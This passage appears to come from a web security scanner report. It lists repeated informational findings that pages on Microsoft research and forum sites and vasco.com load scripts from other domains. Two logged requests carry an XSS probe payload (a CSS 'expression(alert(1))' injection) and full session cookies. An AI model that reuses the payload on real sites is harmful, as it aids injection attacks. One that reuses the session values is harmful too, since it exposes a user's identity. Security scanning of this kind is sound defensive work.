Path:	/en-us/press/fastfacts.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/press/fastfacts.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.211. http://research.microsoft.com/en-us/press/hon.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/hon.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/press/hon.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.212. http://research.microsoft.com/en-us/press/jchayes.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/jchayes.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/press/jchayes.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.213. http://research.microsoft.com/en-us/press/kevinsch.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/kevinsch.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/press/kevinsch.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.214. http://research.microsoft.com/en-us/press/kwood.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/kwood.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/press/kwood.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.215. http://research.microsoft.com/en-us/press/malvar.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/malvar.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/press/malvar.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.216. http://research.microsoft.com/en-us/press/mds.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/mds.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/press/mds.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.217. http://research.microsoft.com/en-us/press/overview.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/overview.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/press/overview.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.218. http://research.microsoft.com/en-us/press/rajamani.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/rajamani.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/press/rajamani.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.219. http://research.microsoft.com/en-us/press/roylevin.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/roylevin.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/press/roylevin.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.220. http://research.microsoft.com/en-us/press/telabbady.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/press/telabbady.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/press/telabbady.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.221. http://research.microsoft.com/en-us/projects/chem4word/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/projects/chem4word/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/projects/chem4word/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.222. http://research.microsoft.com/en-us/projects/creativecommons/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/projects/creativecommons/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/projects/creativecommons/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.223. http://research.microsoft.com/en-us/projects/csec/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/projects/csec/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/projects/csec/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.224. http://research.microsoft.com/en-us/projects/nodexl/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/projects/nodexl/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/projects/nodexl/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.225. http://research.microsoft.com/en-us/projects/researchgames/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/projects/researchgames/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/projects/researchgames/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.226. http://research.microsoft.com/en-us/projects/serviceos/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/projects/serviceos/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/projects/serviceos/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.227. http://research.microsoft.com/en-us/projects/wwt/contest.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/projects/wwt/contest.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/projects/wwt/contest.aspx HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/apps/dp/search.aspx?q=xss&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; s_cc=true; SH=xss||xss.cx sqli httpi dork ghdb bhdb||27b6a"style="x :expression(alert(1)) "d048afd9275||xss txt css img help faq||faq help windows 7; s_sq=msnportalbetarmc%3D%2526pid%253DMicrosoft%252520Research%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A//research.microsoft.com/c/1163%2526ot%253DA

Response

18.228. http://research.microsoft.com/en-us/projects/wwt/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/projects/wwt/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/projects/wwt/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.229. http://research.microsoft.com/en-us/research/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/research/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/research/default.aspx HTTP/1.1
Host: research.microsoft.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/en-us/collaboration/awards/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=f4593467ede44f6aaa7ee86821872394&HASH=f459&LV=20118&V=3; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23; MS_WT=ta_MSCOM_0={"Value":"{\"_wt.control-327131-ta_MSCOM_0\":{\"value\":\"{\\\"runid\\\":\\\"350161\\\",\\\"testid\\\":\\\"347134\\\",\\\"trackid\\\":\\\"350164\\\",\\\"typeid\\\":\\\"1\\\"}\"},\"_wt.user-327131\":{\"value\":\"{\\\"currentPath\\\":\\\"327131-ta_MSCOM_0-350161-350164\\\",\\\"uid\\\":\\\"4824407653540645216\\\",\\\"userSession\\\":\\\"1314992019982-13149920199826988\\\"}\"}}","Expires":"\/Date(1322768021129)\/"}; mcI=Sat, 10 Sep 2011 01:57:49 GMT; A=I&I=AxUFAAAAAAALCQAAtHepBqhKdMJHRzuiM0jZ/g!!&GO=244&CS=117\Gi002j50206; WT_NVR_RU=0=msdn|technet:1=:2=; netreflector=1; _wt.user-311121=1027e544307e5d8b7f05c10e3b31d5d888fad471507d3a52761a2dde11c5f7a91489ba34c786403712645ac8b0e364da72498d40a091deec9e4f89eb126b6c656aafdc846839212b719c52abccb3c9c17421dc888a96dcf02a75b6eee126fd20e30801c4d9e9; _wt.control-311121-ta_MSTemplateHeaderProject_0=1027f65025696c976a36cb5869679d8fdee7c73217227e42357f42be7198a2e049cae273fb8652271e722880fdba35813e2e844fbf8792a6c61dcfcc391d040667abc1920b5648175cda0d018a822c; _opt_vi_7U7CE9V4=C47D4E76-7720-4371-B3BB-F8A565CEC250; WT_FPC=id=50.23.123.106-382843424.30173056:lv=1315007180799:ss=1315004267204; msdn=L=1033; Microsoft.com=SS=280&SS_Refn=150&SS_Url=http://social.msdn.microsoft.com/Search/en-US/?query=xss&rq=meta:Search.MSForums.ForumID(89a61008-0ec7-44d2-8e8e-f4298bd11382)+site:microsoft.com&rn=Announcements+for+all+Forums+Forum~~9/3/2011 2:45:57 AM; omniID=1314964195919_2acb_27e1_036d_ce34d5420c63; MSID=Microsoft.CreationDate=09/02/2011 11:43:32&Microsoft.LastVisitDate=09/03/2011 02:46:31&Microsoft.VisitStartDate=09/03/2011 01:57:14&Microsoft.CookieId=c79a9875-a200-46b5-bc88-db1c768a3311&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=57&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0666-6092-7684-7665; UserState=Returning=False&LastVisit=09/03/2011 02:47:11&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=7e494b87-8d62-4e5e-8051-b07cbe0c11e8&RegUser=; SH=xss||xss.cx sqli httpi dork ghdb bhdb||27b6a"style="x :expression(alert(1)) "d048afd9275||xss txt css img help faq||faq help windows 7; s_cc=true; s_sq=msnportalbetarmc%3D%2526pid%253DCollaboration%252520Opportunities%252520-%252520Microsoft%252520Research%2526pidt%253D1%2526oid%253Dhttp%25253A//research.microsoft.com/c/1010%2526ot%253DA

Response

18.230. http://research.microsoft.com/en-us/um/people/awf/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/awf/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/um/people/awf/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.231. http://research.microsoft.com/en-us/um/people/bahl/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/bahl/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/um/people/bahl/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.232. http://research.microsoft.com/en-us/um/people/borgs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/borgs/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/um/people/borgs/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.233. http://research.microsoft.com/en-us/um/people/jchayes/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/jchayes/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/um/people/jchayes/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.234. http://research.microsoft.com/en-us/um/people/szeliski/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/people/szeliski/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/um/people/szeliski/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.235. http://research.microsoft.com/en-us/um/redmond/about/timeline/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/redmond/about/timeline/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/um/redmond/about/timeline/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.236. http://research.microsoft.com/en-us/um/redmond/projects/kinectsdk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/redmond/projects/kinectsdk/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/um/redmond/projects/kinectsdk/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.237. http://research.microsoft.com/en-us/um/redmond/projects/kinectsdk/download.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/um/redmond/projects/kinectsdk/download.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/um/redmond/projects/kinectsdk/download.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.238. http://research.microsoft.com/feedGen/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/feedGen/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /feedGen/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:28:21 GMT
Connection: close
Content-Length: 59299

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head id="ctl00_ctl00_HeadTag"><meta http-equiv="X-UA-Compatible"
...[SNIP]...
</script>
<script type="text/javascript" src="http://stj.msn.com/br/om/js/s_code.js"></script>
...[SNIP]...

18.239. http://research.microsoft.com/nothing.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/nothing.html

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /nothing.html HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:28:24 GMT
Connection: close
Content-Length: 59299

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head id="ctl00_ctl00_HeadTag"><meta http-equiv="X-UA-Compatible"
...[SNIP]...
</script>
<script type="text/javascript" src="http://stj.msn.com/br/om/js/s_code.js"></script>
...[SNIP]...

18.240. http://social.expression.microsoft.com/Forums/ar-SA/wpf/thread/786f2813-de28-4eda-ba14-9910ce655dc6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.expression.microsoft.com
Path:	/Forums/ar-SA/wpf/thread/786f2813-de28-4eda-ba14-9910ce655dc6

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js
http://code.jquery.com/jquery-1.6.1.min.js
http://i1.social.s-msft.com/Forums/GlobalResources/scripts/common.min.js?cver=1864.989%0d%0a
http://i1.social.s-msft.com/Forums/resources/scripts/messages.js?cver=1864.989%0d%0a
http://i1.social.s-msft.com/Forums/resources/scripts/webtrends.js?cver=1864.989%0d%0a
http://i4.social.s-msft.com/Forums/en-US/resources.js?cver=1864.989%0d%0a
http://i4.social.s-msft.com/Forums/resources/scripts/core.js?cver=1864.989%0d%0a
http://widgets.membership.s-msft.com/v1/loader.js?brand=Expression&lang=en-US

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: msdn=L=1033; domain=.microsoft.com; expires=Mon, 03-Oct-2011 12:58:15 GMT; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
Set-Cookie: msdn=L=1033; domain=.microsoft.com; expires=Mon, 03-Oct-2011 12:58:15 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB19
Date: Sat, 03 Sep 2011 12:58:15 GMT
Content-Length: 60480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"
...[SNIP]...
<meta name="CommunityInfo" content=" B=Expression;A=Forums;L=en-US;" />
<script src="http://code.jquery.com/jquery-1.6.1.min.js" type="text/javascript" language="javascript"></script>
...[SNIP]...
</div>

<script src="http://i4.social.s-msft.com/Forums/en-US/resources.js?cver=1864.989%0d%0a" type="text/javascript" language="javascript"></script>
<script src="http://i4.social.s-msft.com/Forums/resources/scripts/core.js?cver=1864.989%0d%0a" type="text/javascript" language="javascript"></script>

<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...
</script>
<script src="http://i1.social.s-msft.com/Forums/resources/scripts/messages.js?cver=1864.989%0d%0a" type="text/javascript" language="javascript"></script>
...[SNIP]...
</script>
<script src="http://i1.social.s-msft.com/Forums/resources/scripts/webtrends.js?cver=1864.989%0d%0a" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="http://widgets.membership.s-msft.com/v1/loader.js?brand=Expression&lang=en-US" type="text/javascript" language="javascript"></script>
...[SNIP]...
</script>

<script src="http://i1.social.s-msft.com/Forums/GlobalResources/scripts/common.min.js?cver=1864.989%0d%0a" type="text/javascript" language="javascript"></script>
...[SNIP]...

18.241. http://social.expression.microsoft.com/Forums/da-DK/wpf/thread/16309d89-5f65-4e49-9ce5-38f2a466a2c0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://social.expression.microsoft.com
Path:	/Forums/da-DK/wpf/thread/16309d89-5f65-4e49-9ce5-38f2a466a2c0

Issue detail

The response dynamically includes the following scripts from other domains:

http://code.jquery.com/jquery-1.6.1.min.js
http://i1.social.s-msft.com/Forums/GlobalResources/scripts/common.min.js?cver=1864.989%0d%0a
http://i1.social.s-msft.com/Forums/resources/scripts/messages.js?cver=1864.989%0d%0a
http://i1.social.s-msft.com/Forums/resources/scripts/webtrends.js?cver=1864.989%0d%0a
http://i3.social.s-msft.com/Forums/da-DK/resources.js?cver=1864.989%0d%0a
http://i4.social.s-msft.com/Forums/resources/scripts/core.js?cver=1864.989%0d%0a
http://widgets.membership.s-msft.com/v1/loader.js?brand=Expression&lang=da-DK

Request

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: msdn=L=1030; domain=.microsoft.com; expires=Mon, 03-Oct-2011 12:58:16 GMT; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
Set-Cookie: msdn=L=1030; domain=.microsoft.com; expires=Mon, 03-Oct-2011 12:58:16 GMT; path=/
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB22
Date: Sat, 03 Sep 2011 12:58:15 GMT
Content-Length: 28901

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"
...[SNIP]...
<meta name="CommunityInfo" content=" B=Expression;A=Forums;L=da-DK;" />
<script src="http://code.jquery.com/jquery-1.6.1.min.js" type="text/javascript" language="javascript"></script>
...[SNIP]...
</div>

<script src="http://i3.social.s-msft.com/Forums/da-DK/resources.js?cver=1864.989%0d%0a" type="text/javascript" language="javascript"></script>
<script src="http://i4.social.s-msft.com/Forums/resources/scripts/core.js?cver=1864.989%0d%0a" type="text/javascript" language="javascript"></script>
...[SNIP]...
</script>
<script src="http://i1.social.s-msft.com/Forums/resources/scripts/messages.js?cver=1864.989%0d%0a" type="text/javascript" language="javascript"></script>
...[SNIP]...
</script>
<script src="http://i1.social.s-msft.com/Forums/resources/scripts/webtrends.js?cver=1864.989%0d%0a" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="http://widgets.membership.s-msft.com/v1/loader.js?brand=Expression&lang=da-DK" type="text/javascript" language="javascript"></script>
...[SNIP]...
</script>

<script src="http://i1.social.s-msft.com/Forums/GlobalResources/scripts/common.min.js?cver=1864.989%0d%0a" type="text/javascript" language="javascript"></script>
...[SNIP]...

18.242. http://vasco.com/company/contactus.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vasco.com
Path:	/company/contactus.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /company/contactus.aspx HTTP/1.1
Host: vasco.com
Proxy-Connection: keep-alive
Referer: http://vasco.com/support/support_and_downloads.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=scg42x55p3xbinitbik3gp45; __utma=144557234.91160880.1315071157.1315071157.1315071157.1; __utmb=144557234.13.10.1315071157; __utmc=144557234; __utmz=144557234.1315071157.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 03 Sep 2011 17:36:26 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 41832

<?xml version="1.0" encoding="UTF-8"?>

